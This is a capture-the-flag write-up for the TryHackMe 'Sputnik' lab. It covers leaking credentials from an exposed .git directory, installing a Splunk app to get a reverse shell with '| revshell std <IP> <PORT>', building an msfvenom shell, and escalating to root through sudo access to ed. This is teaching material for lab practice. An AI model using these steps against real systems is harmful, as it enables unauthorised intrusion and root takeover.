Sputnik – Try Hack Me

Let’s start by deploying the machine and port scanning it.

We notice a git repository, so let’s access it using our browser. Go to http://<IP>:55555/.git . Accessing /logs/HEAD we notice a git repo.

Let’s clone it and check it out. We didn’t find anything useful, but we can take a look at the logs.

Searching through the commits we notice there is a file named secret.

Git show 121cce9038070c86caa60707bc312d8a478d903f and we have an output: sputnik:ameer_says_thank_you_and_good_job

Now, we can try to login with the provided user and password on port 61337.

After some research i came across this repo: https://github.com/TBGSecurity/splunk_shells which is going to help us get a reverse shell. But to do that, we downloaded the files, and we have to install them on Splunk. So, go to Search & reporting, Manage Apps and click on Install all from file. Upload the archive and restart Splunk.

To get the reverse shell go to the search bar and use the following syntax: | revshell std <IP> <PORT> and hit enter. You should receive the connection.

We try to import a shell using python with no luck, so we use msfvenom to create another reverse shell.

We start our listener and try importing the shell again. This time importing it is successful.

Trying to see if we have any sudo rights, we see we can run /bin/ed as user root.

ED is a text editor, and we can leverage it to spawn a root shell. You can read about it here: https://www.tutorialspoint.com/unix_commands/ed.htm.

Looking through the manual i came across this:

!command 	Executes command via sh(1). If the first character of command is ‘!’, then it is replaced by text of the previous ‘!command’. ed does not process command for backslash (\) escapes. However, an unescaped ‘%’ is replaced by the default filename. When the shell returns from execution, a ‘!’ is printed to the standard output. The current line is unchanged. 

Let’s run ED and spawn the root shell.

The root flag is in the root folder.